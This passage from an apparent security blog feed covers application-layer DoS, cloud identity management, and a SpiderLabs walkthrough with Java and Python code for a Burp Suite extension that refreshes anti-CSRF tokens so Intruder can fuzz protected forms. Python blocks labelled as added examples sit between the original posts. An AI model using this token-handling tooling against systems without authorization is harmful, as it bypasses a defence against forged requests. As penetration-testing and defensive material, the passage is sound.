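def analyze(lines, window_seconds=10, rate_threshold=10, broad_search_threshold=5):
    """Return {ip: [reasons]} for clients whose behaviour matches the DoS patterns above.

    Lines are expected in chronological order, as a log file normally is.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the sliding window
    peak_rate = defaultdict(int)  # ip -> most requests ever seen inside one window
    broad = defaultdict(int)      # ip -> number of overly broad search requests
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue                      # skip junk rather than abort the whole run
        ip, ts = ev["ip"], ev["ts"]
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        peak_rate[ip] = max(peak_rate[ip], len(window))
        if ev["method"] == "GET" and is_broad_search(ev["target"]):
            broad[ip] += 1

    flagged = {}
    for ip in sorted(peak_rate):
        reasons = []
        if peak_rate[ip] >= rate_threshold:
            reasons.append(f"{peak_rate[ip]} requests within {window_seconds}s")
        if broad[ip] >= broad_search_threshold:
            reasons.append(f"{broad[ip]} overly broad search queries")
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", "; ".join(reasons))
```

The two signals are deliberately independent: a client that stays under the rate threshold but keeps asking for everything in the catalogue is still flagged, which is the case the paragraph describes. In production the thresholds belong in configuration and the per-client state needs an expiry, but the windowing logic is the same.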
<br />
The advantage to application attacks is their ability to evade many of the defenses put in place to stop DoS. Our Managing WAF series discussed <a href="https://securosis.com/blog/pragmatic-waf-management-securing-the-waf">WAF evasion</a>, and IDS evasion is a similarly mature and effective attack discipline. These network security devices are little more than speed bumps to knowledgeable attackers, so developers need to ensure their applications can deal with the attacks. That’s another point we made in the <a href="https://securosis.com/blog/pragmatic-waf-management-application-lifecycle-integration">Application Lifecycle Integration</a> post.<br />
<br />
<h2>Targeting the Defenses</h2><br />
Attackers can also perform some reconnaissance to learn about targets’ defenses in order to game them. For instance, financial institutions tend to do a lot of security monitoring due to severe regulatory oversight requirements, so if an attacker constantly loads web pages or enters dummy transactions they may manage to overwhelm the monitoring system. Does this impact application availability? Probably not, but it at least hampers the security team’s efforts to figure out what’s going on, providing an opportunity for another attack to exfiltrate data undetected.<br />
<br />
<h2>Impacting the Wallet</h2><br />
An emerging DoS attack works economically even when it does not impair service availability. The so-called EDoS (economic denial of service) attack involves a focused attempt to increase the cost of the target’s technology infrastructure. In a network attack, bad guys take advantage of excessive bandwidth charges. So even if a target successfully defends against an attack, their bandwidth to mitigate a multi-gigabyte attack could cost as much or more than an outage. Similarly, if a target leverages public cloud infrastructure to auto-provision new instances as utilization thresholds are met, an application attack can have a substantial financial cost without ever threatening availability. One potential endgame for cloud-based attacks is reaching the target’s credit limit with their cloud provider, triggering an outage when the provider caps their usage.<br />
<br />
Attackers can mix and match a variety of different DoS attacks to achieve their goal of adversely impacting availability of an application or service. Next we will move on to tactics and approaches to defend against DoS, starting with network attacks.<br />
<br />
- Mike Rothman<br />
(2) <a href="https://securosis.com/blog/defending-against-dos-attacks-the-attacks">Comments</a><br />
<br />
New Series: Understanding and Selecting Identity Management for Cloud Services (posted 2012-10-05)<br />
<a href="https://securosis.com/blog/new-series-understanding-and-selecting-identity-management-for-cloud-servic">New Series: Understanding and Selecting Identity Management for Cloud Services</a>: <p>Adrian and Gunnar here, kicking off a new series on Identity Management for Cloud Services.</p><br />
<p>We have been hearing about Federated Identity and Single Sign-On services for the last decade, but demand for these features has only fully blossomed in the last few years, as companies have needed to integrate their internal identity management systems. The meanings of these terms have been actively evolving, under the influence of cloud computing. The ability to manage what resources your users can access <em>outside</em> your corporate network – on third party systems outside your control – is not just a simple change in deployment models; it is a fundamental shift in how we handle authentication, authorization, and provisioning. Enterprises want to extend the capabilities of low-cost cloud service providers to their users – while maintaining security, policy management, and compliance functions. We want to illuminate these changes in approach and technology. And if you have not been keeping up to date with these changes in the IAM market, you will likely need to unlearn what you know. We are not talking about making your old Active Directory accessible to internal <em>and</em> external users, or running LDAP in your Amazon EC2 constellation. We are talking about the fusion of multiple identity and access management capabilities – possibly across multiple cloud services. We are gaining the ability to authorize users across multiple services, without distributing credentials to each and every service provider.</p><br />
<p>Cloud services – be they SaaS, PaaS, or IaaS – are not just new environments in which to deploy existing IAM tools. They fundamentally shift existing IAM concepts. It’s not just that the way IT resources are deployed in the cloud, and the way consumers want to interact with those resources, have changed; those changes are driven by economic models of efficiency and scale. For example enterprise IAM is largely about provisioning users <em>and</em> resources into a common directory, say Active Directory or RACF, where the IAM tool enforces access policy. The cloud changes this model to a chain of responsibility, so a single IAM instance cannot completely mediate access policy. A cloud IAM instance has a shared responsibility in – as an example – assertion <em>or</em> validation of identity. Carving up this set of shared access policy responsibilities is a game changer for the enterprise.</p><br />
<p>We need to rethink how we manage trust and identities in order to take advantage of elastic, on-demand, and widely available web services for heterogeneous clients. Right now, behind the scenes, new approaches to identity and access management are being deployed – often seamlessly into cloud services we already use. They reduce the risk and complexity of mapping identity to public or semi-public infrastructure, while remaining flexible enough to take full advantage of <em>multiple</em> cloud service and deployment models.</p><br />
<p>Our goal for this series is to illustrate current trends and technologies that support cloud identity, describe the features available <em>today,</em> and help you navigate through the existing choices. The series will cover:</p><br />
<ul><li><strong>The Problem Space:</strong> We will introduce the issues that are driving cloud identity – from fully outsourced, hybrid, and proxy cloud services and deployment models. We will discuss how the cloud model is different than traditional in-house IAM, and discuss issues raised by the loss of control and visibility into cloud provider environments. We will consider the goals of IAM services for the cloud – drilling into topics including identity propagation, federation, and roles and responsibilities (around authentication, authorization, provisioning, and auditing). We will wrap up with the security goals we must achieve, and how compliance and risk influence decisions.</li>
<li><strong>The Cloud Providers:</strong> For each of the cloud service models (SaaS, PaaS, and IaaS) we will delve into the IAM services built into the infrastructure. We will profile IAM offerings from some of the leading <em>independent</em> cloud identity vendors for each of the service models – covering what they offer and how their features are leveraged or integrated. We will illustrate these capabilities with a simple chart that shows what each provides, highlighting the conceptual model each vendor embraces to supply identity services. We will talk about what you will be responsible for as a customer, in terms of integration and management. This will include some of the deficiencies of these services, as well as areas to consider augmenting.</li>
<li><strong>Use Cases:</strong> We will discuss three of the principal use cases we see today, as organizations move existing applications to the cloud and develop new cloud services. We will cover extending existing IAM systems to cover external SaaS services, developing IAM for new applications deployed on IaaS/PaaS, and adopting Identity as a Service for fully external IAM.</li>
<li><strong>Architecture and Design:</strong> We will start by describing key concepts, including consumer/service patterns, roles, assertions, tokens, identity providers, relying party applications, and trust. We will discuss the available technologies for the heavy lifting (such as SAML, XACML, and SCIM) and discuss the problems they are designed to solve. We will finish with an outline of the different architectural models that will frame how you implement cloud identity services, including the integration patterns and tools that support each model.</li>
<li><strong>Implementation Roadmap:</strong> IAM projects are complex, encompass most IT infrastructure, and may take years to implement. Trying to do everything at once is a recipe for failure. This portion of our discussion will help ensure you don’t bite off more than you can chew. We will discuss how to select an architectural model that meets your requirements, based on the cloud service and deployment models you selected. Then we will create different implementation roadmaps depending on your project goals and critical business requirements.</li>
<li><strong>Buyer’s Guide:</strong> We will close by examining key decision criteria to help select a platform. We will provide questions to determine which vendors offer solutions that support your architectural model, and criteria to measure the appropriateness of a vendor solution against your design goals. We will also help walk you through the evaluation process.</li>
</ul><br />
<p>As always, we encourage you to ask questions and chime in with comments and suggestions. The community helps make our research better, and we encourage <em>your</em> participation.</p><br />
<p>Next: the problems addressed by cloud identity services.</p><br />
- Adrian Lane<br />
(1) <a href="https://securosis.com/blog/new-series-understanding-and-selecting-identity-management-for-cloud-servic">Comments</a><br />
<br />
Adding Anti-CSRF Support to Burp Suite Intruder (posted 2012-10-05)<br />
<a href="http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/FlD9q38Wr94/adding-anti-csrf-support-to-burp-suite-intruder.html">Adding Anti-CSRF Support to Burp Suite Intruder</a>: <br />
<div>In the web application penetration testing industry, <a href="http://www.portswigger.net/burp/" title="Burp Suite">Burp Suite</a> is considered a must-have tool – it includes an intercepting proxy, both active and passive web vulnerability scanners, crawler, session ID analysis tools and various other useful features, all under a single application. One of Burp's best features is the <a href="http://www.portswigger.net/burp/help/intruder.html" title="Burp Suite Intruder">Intruder</a>, a tool which allows the tester to provide a list of values which should be sent to the application as parameter values. By providing values which trigger SQL errors or inject Javascript into the resulting page, one can easily determine if and how the application is doing filtering on the parameters, and whether it is vulnerable to a given issue.<br />
<br />
<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5ae680970c-pi" style="display: inline;"><img alt="Intruder" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5ae680970c-800wi" title="Intruder" /></a><br />
Burp's Intruder works perfectly when the application responds to those requests as if they came from the user. The screenshot above shows the submission of the following HTML form:<br />
<pre style="background: #ffffff; color: black;"><span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #274796;"> </span><span style="color: #074726;">action</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"/CSRFGuardTestAppVulnerable/HelloWorld"</span><span style="color: #274796;"> </span>
<span style="color: #074726;">method</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"POST"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"first"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"text"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"SpiderLabs"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"name"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"></</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #a65700;">></span>
</pre>However, modern application frameworks are adding support for Anti-CSRF (<a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" title="OWASP Cross-Site Request Forgery reference">Cross-Site Request Forgery</a>) techniques, which protect the application from forged requests such as those Burp uses. The most commonly implemented prevention measure is the <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern" title="Synchronizer Token Pattern">Synchronizer Token Pattern</a>, which adds a parameter with a random value to all forms generated by the application for a given user session, and validates this token when the form is submitted. For example:<br />
<pre style="background: #ffffff; color: black;"><span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #274796;"> </span><span style="color: #074726;">action</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"/CSRFGuardTestApp/HelloWorld"</span>
<span style="color: #274796;"> </span><span style="color: #074726;">method</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"POST"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"first"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"text"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"SpiderLabs"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"name"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"submit"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"><</span><span style="color: maroon; font-weight: bold;">input</span><span style="color: #274796;"> </span><span style="color: #074726;">type</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"hidden"</span><span style="color: #274796;"> </span><span style="color: #074726;">value</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"Z0XN-1FRF-975E-GB9F-GGQM-L2RC-04H1-GKHQ"</span>
<span style="color: #274796;"> </span><span style="color: #074726;">name</span><span style="color: #808030;">=</span><span style="color: #0000e6;">"OWASP_CSRFTOKEN"</span><span style="color: #a65700;">></span>
<span style="color: #a65700;"></</span><span style="color: maroon; font-weight: bold;">form</span><span style="color: #a65700;">></span>
</pre>Because the <strong>OWASP_CSRFTOKEN</strong> parameter will change between every submission, the Intruder will not work, as it expects the application to respond to each request as if it came from the user. The solution is rather simple: instead of simply feeding a set of values to the parameters being tested, we need to have the Intruder populate the Anti-CSRF token parameter from the form page.<br />
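To make concrete why a replayed request fails, here is the server side of the Synchronizer Token Pattern as an added example in Python. It is not code from the original post, from OWASP CSRFGuard or from SpiderLabs; the <code>Session</code> class is a stand-in for a real session store, and rotating the token on every form render is an assumption made so the replay failure the paragraph describes is visible (CSRFGuard can also keep one token per session).

```python
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs

TOKEN_PARAM = "OWASP_CSRFTOKEN"  # parameter name as in the form shown above


class Session:
    """Stand-in for a server-side session record (constructed for this example)."""

    def __init__(self):
        self.csrf_token = None


def issue_token(session):
    """Mint a fresh unguessable token and remember it server-side.

    Rotating the token on every render (an assumption here) is what makes a
    replayed body fail validation, which is exactly why an unmodified Intruder
    run breaks against this pattern.
    """
    session.csrf_token = secrets.token_urlsafe(32)
    return session.csrf_token


def render_form(session, action="/CSRFGuardTestApp/HelloWorld"):
    """Render the form from the post with the hidden token field appended."""
    token = issue_token(session)
    return (
        f'<form action="{escape(action)}" method="POST" name="first">\n'
        '<input type="text" value="SpiderLabs" name="name">\n'
        '<input type="submit" value="submit" name="submit">\n'
        f'<input type="hidden" value="{escape(token)}" name="{TOKEN_PARAM}">\n'
        "</form>"
    )


def validate_submission(session, body):
    """Accept a urlencoded POST body only if it carries the session's current token."""
    submitted = parse_qs(body).get(TOKEN_PARAM, [""])[0]
    expected = session.csrf_token
    if not expected or not submitted:
        return False
    # Constant-time comparison so response timing does not leak how much of a guess matched.
    return hmac.compare_digest(submitted.encode(), expected.encode())


def demo():
    """One valid submission, then the replay and missing-token failures."""
    session = Session()
    render_form(session)
    first = session.csrf_token
    ok = validate_submission(session, f"name=SpiderLabs&submit=submit&{TOKEN_PARAM}={first}")
    render_form(session)  # the form is fetched again, so the token rotates
    replay = validate_submission(session, f"name=SpiderLabs&submit=submit&{TOKEN_PARAM}={first}")
    missing = validate_submission(session, "name=SpiderLabs&submit=submit")
    return ok, replay, missing


if __name__ == "__main__":
    print(demo())  # (True, False, False)
```

The second <code>render_form()</code> call is the step a tester's tooling has to reproduce: without fetching the form again and reading the new hidden value, every submission after the first carries a stale token and is rejected.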
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322d0013970b-pi" style="display: inline;"><img alt="Intruder_regular" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322d0013970b-800wi" title="Intruder_regular" /></a><br />
<br />
This changes the default behavior of the Intruder tool quite a bit. First, it must know which parameter represents the Anti-CSRF token in the request. While many frameworks will use parameter names that include the "csrf" string, this can be configured per application, and thus we cannot rely on automatic detection. Second, it means the Intruder must make twice the number of requests it would normally perform: one to fetch the form page, which contains the Anti-CSRF token embedded in it, and a second one to actually submit the form with the parameter values provided by the tester. We will address both issues by developing a Burp extension called <strong>CSRF Intruder</strong>.<br />
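The token-handling step just described, as an added example in Python rather than the extension's own Java (this is not SpiderLabs' code): read the hidden token out of a freshly fetched form page and rewrite the outgoing urlencoded body with it. The form page below is constructed from the example form shown earlier, and the parameter name is passed in explicitly for the reason given above, that it cannot be detected reliably.

```python
import re
from html import unescape
from urllib.parse import parse_qsl, urlencode

INPUT_TAG_RE = re.compile(r"<input\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')


def extract_token(form_html, token_param):
    """Return the value of the hidden <input> named token_param, or None if absent."""
    for tag in INPUT_TAG_RE.findall(form_html):
        attrs = {k.lower(): unescape(v) for k, v in ATTR_RE.findall(tag)}
        if attrs.get("type", "").lower() == "hidden" and attrs.get("name") == token_param:
            return attrs.get("value")
    return None


def refresh_token_in_body(body, token_param, fresh_token):
    """Replace token_param in a urlencoded body (or append it if missing),
    leaving the other parameters and their order untouched."""
    pairs = parse_qsl(body, keep_blank_values=True)
    rewritten = [(k, fresh_token if k == token_param else v) for k, v in pairs]
    if all(k != token_param for k, _ in pairs):
        rewritten.append((token_param, fresh_token))
    return urlencode(rewritten)


def prepare_submission(form_page_html, payload_body, token_param):
    """The two-step flow from the post: parse the token out of the fetched form
    page, then rewrite the tester's payload body with it. Fails loudly when the
    page carries no token, so a misconfigured parameter name is not silently sent."""
    token = extract_token(form_page_html, token_param)
    if token is None:
        raise ValueError(f"form page has no hidden input named {token_param!r}")
    return refresh_token_in_body(payload_body, token_param, token)


# Constructed form page: the example form from the post, with its token value.
FORM_PAGE = """<html><body>
<form action="/CSRFGuardTestApp/HelloWorld"
 method="POST" name="first">
<input type="text" value="SpiderLabs" name="name">
<input type="submit" value="submit" name="submit">
<input type="hidden" value="Z0XN-1FRF-975E-GB9F-GGQM-L2RC-04H1-GKHQ"
 name="OWASP_CSRFTOKEN">
</form>
</body></html>"""

if __name__ == "__main__":
    print(prepare_submission(FORM_PAGE, "name=test&submit=submit&OWASP_CSRFTOKEN=stale",
                             "OWASP_CSRFTOKEN"))
```

A regular-expression scan is enough for the single-form pages this tool targets; a page with several forms would need the token taken from the form whose <code>action</code> matches the request being sent.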
Burp offers an extensibility API, called <a href="http://www.portswigger.net/burp/extender/" title="Burp Extender">Burp Extender</a>, which allows us to hook into various points in the application, including the UI and the request interception engine. The first thing we need to do is create a Java class which will host our extension.<br />
<pre style="background: #ffffff; color: black;"><span style="color: maroon; font-weight: bold;">package</span><span style="color: #004a43;"> burp</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">import</span><span style="color: #004a43;"> spiderlabs</span><span style="color: #808030;">.</span><span style="color: #004a43;">burp</span><span style="color: #808030;">.</span><span style="color: #004a43;">intruder</span><span style="color: #808030;">.</span><span style="color: #004a43;">CSRFIntruder</span><span style="color: purple;">;</span>

<span style="color: maroon; font-weight: bold;">public</span> <span style="color: maroon; font-weight: bold;">class</span> BurpExtender <span style="color: purple;">{</span>
    <span style="color: maroon; font-weight: bold;">private</span> IBurpExtenderCallbacks callbacks<span style="color: purple;">;</span>
    <span style="color: maroon; font-weight: bold;">private</span> CSRFIntruder csrfIntruder<span style="color: purple;">;</span>

    <span style="color: maroon; font-weight: bold;">public</span> <span style="color: #bb7977;">void</span> registerExtenderCallbacks<span style="color: #808030;">(</span>IBurpExtenderCallbacks callbacks<span style="color: #808030;">)</span> <span style="color: purple;">{</span>
        <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks <span style="color: #808030;">=</span> callbacks<span style="color: purple;">;</span>
        <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>csrfIntruder <span style="color: #808030;">=</span> <span style="color: maroon; font-weight: bold;">new</span> CSRFIntruder<span style="color: #808030;">(</span><span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">)</span><span style="color: purple;">;</span>
        <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>registerMenuItem<span style="color: #808030;">(</span><span style="color: #0000e6;">"CSRF Intruder"</span><span style="color: #808030;">,</span> <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>csrfIntruder<span style="color: #808030;">)</span><span style="color: purple;">;</span>
        <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>issueAlert<span style="color: #808030;">(</span><span style="color: #bb7977; font-weight: bold;">String</span><span style="color: #808030;">.</span>format<span style="color: #808030;">(</span><span style="color: #0000e6;">"Starting up CSRF Intruder extension [%s]"</span><span style="color: #808030;">,</span>
            <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>getClass<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">.</span>getCanonicalName<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
    <span style="color: purple;">}</span>

    <span style="color: maroon; font-weight: bold;">public</span> <span style="color: #bb7977;">void</span> processHttpMessage<span style="color: #808030;">(</span>java<span style="color: #808030;">.</span>lang<span style="color: #808030;">.</span><span style="color: #bb7977; font-weight: bold;">String</span> toolName<span style="color: #808030;">,</span> <span style="color: #bb7977;">boolean</span> messageIsRequest<span style="color: #808030;">,</span>
            IHttpRequestResponse messageInfo<span style="color: #808030;">)</span> <span style="color: purple;">{</span>
        <span style="color: dimgrey;">/* Intercept Intruder requests and check if they came from CSRF Intruder */</span>
        <span style="color: maroon; font-weight: bold;">if</span> <span style="color: #808030;">(</span>toolName<span style="color: #808030;">.</span>equals<span style="color: #808030;">(</span><span style="color: #0000e6;">"intruder"</span><span style="color: #808030;">)</span> <span style="color: #808030;">&amp;&amp;</span> messageIsRequest<span style="color: #808030;">)</span>
            <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>issueAlert<span style="color: #808030;">(</span><span style="color: #0000e6;">"TODO: Intercept CSRF Intruder requests"</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
    <span style="color: purple;">}</span>
<span style="color: purple;">}</span>
</pre>The <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtender.html#registerExtenderCallbacks(burp.IBurpExtenderCallbacks)">registerExtenderCallbacks()</a> method acts as the extension constructor, and is the first method called by Burp when the extension is loaded. It provides us with an <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtenderCallbacks.html">IBurpExtenderCallbacks</a> instance, which we use to create a new context menu entry for our CSRF Intruder handler. We also implement a <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtender.html#processHttpMessage(java.lang.String,%20boolean,%20burp.IHttpRequestResponse)">processHttpMessage()</a> method, which we will use to intercept Intruder requests and modify the Anti-CSRF token values before they are sent to the remote application.<br />
How does Burp use this class? It must obey a series of restrictions before Burp can find and use it:<br />
<ul><li>It must be in package <strong>burp</strong>;</li>
<li>It must be named <strong>BurpExtender</strong>;</li>
<li>It must implement at least one of the methods in interface <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtender.html" title="IBurpExtender Interface">IBurpExtender</a>;</li>
<li>Burp must be executed with the JVM classpath pointing to our BurpExtender class:<br />
<br />
<pre>java -classpath burp.jar;BurpProxyExtender.jar burp.StartBurp</pre></li>
</ul>If these criteria are met, then when Burp starts up, our CSRF Intruder extension’s message should show up in the Alerts tab.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee3d121bb970d-pi" style="display: inline;"><img alt="Burp_alerts" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee3d121bb970d-800wi" title="Burp_alerts" /></a><br />
We can now right-click everywhere where a "Send to [...]" menu entry is displayed and click on "CSRF Intruder".<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5bc6fb970c-pi" style="display: inline;"><img alt="Csrf_intruder_context_menu" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5bc6fb970c-800wi" title="Csrf_intruder_context_menu" /></a><br />
Clicking on the CSRF Intruder menu entry will trigger the handler in our CSRFIntruder class, shown below:<br />
<pre style="background: #ffffff; color: black;">package spiderlabs.burp.intruder;

import javax.swing.JOptionPane;
import spiderlabs.burp.intruder.gui.CSRFConfigurationDialog;
import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import burp.IMenuItemHandler;

public class CSRFIntruder implements IMenuItemHandler {
    private IBurpExtenderCallbacks callbacks;

    public CSRFIntruder(IBurpExtenderCallbacks callbacks) {
        this.callbacks = callbacks;
    }

    @Override
    public void menuItemClicked(String caption, IHttpRequestResponse[] messageInfo) {
        try {
            // Only the first selected message is used as the template request.
            IHttpRequestResponse message = messageInfo[0];

            // Use the Referer header (if present) as the suggested source form URL,
            // i.e. the page from which fresh Anti-CSRF token values can be read.
            String refererUrl = new String();
            for (String header: this.callbacks.getHeaders(message.getRequest())) {
                System.out.println(header);
                if (header.startsWith("Referer:"))
                    refererUrl = header.split(":\\s")[1];
            }

            // All parameters of the request, so the user can pick the token parameter.
            String parameters[][] = this.callbacks.getParameters(message.getRequest());
            CSRFIntruderConfiguration configuration =
                CSRFConfigurationDialog.getConfigurationFromDialog(refererUrl, parameters);
            this.callbacks.issueAlert(configuration.toString());
        } catch (Exception exception) {
            // Any failure (e.g. a malformed Referer header) is reported in the Alerts tab.
            this.callbacks.issueAlert(String.format("Error while obtaining request URL: %s",
                exception.toString()));
        }
    }
}
</pre>The menuItemClicked() handler does two things: first, it fetches the value of the Referer header (if present) from the request the user right-clicked on and uses it as the suggested source form URL, that is, the page where the Anti-CSRF token values can be found; next, it obtains a list of all parameters in that request. It then passes both to a CSRFConfigurationDialog, which displays the URL and parameters and waits for the user to configure the Anti-CSRF parameters.<br />
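As an added example (not code from the SpiderLabs post or from the extension itself), the Python below performs the same two extraction steps on a raw HTTP request using only the standard library, so the logic can be exercised outside Burp. The sample request, host name and parameter names are constructed for this example, and it also covers the two inputs the Java handler leaves to its catch block: a request with no Referer header, and a Referer value with no whitespace after the colon.<br />

```python
"""Added example (not from the SpiderLabs post): the two steps the
menuItemClicked() handler performs through Burp's callbacks, done on a
raw HTTP request with the standard library so they can be tested
outside Burp.  The request below is constructed for this example."""
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request, as Burp would hand it to an extension.
SAMPLE_REQUEST = (
    "POST /account/transfer HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Referer: https://app.example.test/account/transfer?step=1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123\r\n"
    "Content-Length: 38\r\n"
    "\r\n"
    "amount=100&to=1234&csrf_token=9f2c1e7a"
)


def split_request(raw):
    """Return (request_line, header lines, body) from a raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    return lines[0], lines[1:], body


def referer_url(headers):
    """Suggested source-form URL: the Referer value, or "" when absent.

    Header names are matched case-insensitively and the value is taken
    from after the first colon, so 'Referer:https://x' (no space) and
    URLs containing ':' are handled instead of raising."""
    for header in headers:
        name, _, value = header.partition(":")
        if name.strip().lower() == "referer":
            return value.strip()
    return ""


def request_parameters(request_line, headers, body):
    """List of (location, name, value) for query, cookie and body params,
    the per-parameter view the configuration dialog presents."""
    params = []
    path = request_line.split(" ")[1]
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        params.append(("url", name, value))
    content_type = ""
    for header in headers:
        name, _, value = header.partition(":")
        if name.strip().lower() == "content-type":
            content_type = value.strip().lower()
        elif name.strip().lower() == "cookie":
            for cookie in value.split(";"):
                cname, _, cvalue = cookie.strip().partition("=")
                params.append(("cookie", cname, cvalue))
    # Only form-encoded bodies are split into parameters.
    if body and content_type.startswith("application/x-www-form-urlencoded"):
        for name, value in parse_qsl(body, keep_blank_values=True):
            params.append(("body", name, value))
    return params


def suggest_configuration(raw):
    """Return what the dialog needs: the Referer URL and the parameter list."""
    request_line, headers, body = split_request(raw)
    return referer_url(headers), request_parameters(request_line, headers, body)


if __name__ == "__main__":
    url, params = suggest_configuration(SAMPLE_REQUEST)
    print("source form URL:", url or "(none)")
    for location, name, value in params:
        print(f"  [{location}] {name} = {value}")
```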
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322dab3a970b-pi" style="display: inline;"><img alt="Csrf_intruder_configuration" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322dab3a970b-800wi" title="Csrf_intruder_configuration" /></a><br />
When the user provides the URL and the token parameter to be used, we already have all the information necessary to start up Intruder and manipulate its requests. This will come in a second post.</div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-69801877388114095082012-10-05T05:40:00.001-07:002012-10-05T05:40:40.260-07:00Forensic Scanner<a href="http://windowsir.blogspot.com/2012/10/forensic-scanner.html">Forensic Scanner</a>: I've posted regarding my thoughts on a <a href="http://windowsir.blogspot.com/2011/10/forensic-scanner.html">Forensic Scanner</a> before, and just today, I gave a short presentation at the <a href="http://www.basistech.com/about-us/events/open-source-forensics-conference/">#OSDFC conference</a> on the subject. <br />
<br />
Rather than describing the scanner, this time around, I <a href="http://code.google.com/p/forensicscanner/downloads/list">released</a> it. The archive contains the Perl source code, a 'compiled' executable that you can run on Windows without installing Perl, a directory of plugins, and PDF document describing how to use the tool. I've also started populating the <a href="http://code.google.com/p/forensicscanner/wiki/Home?tm=6">wiki</a> with information about the tool, and how it's used.<br />
<br />
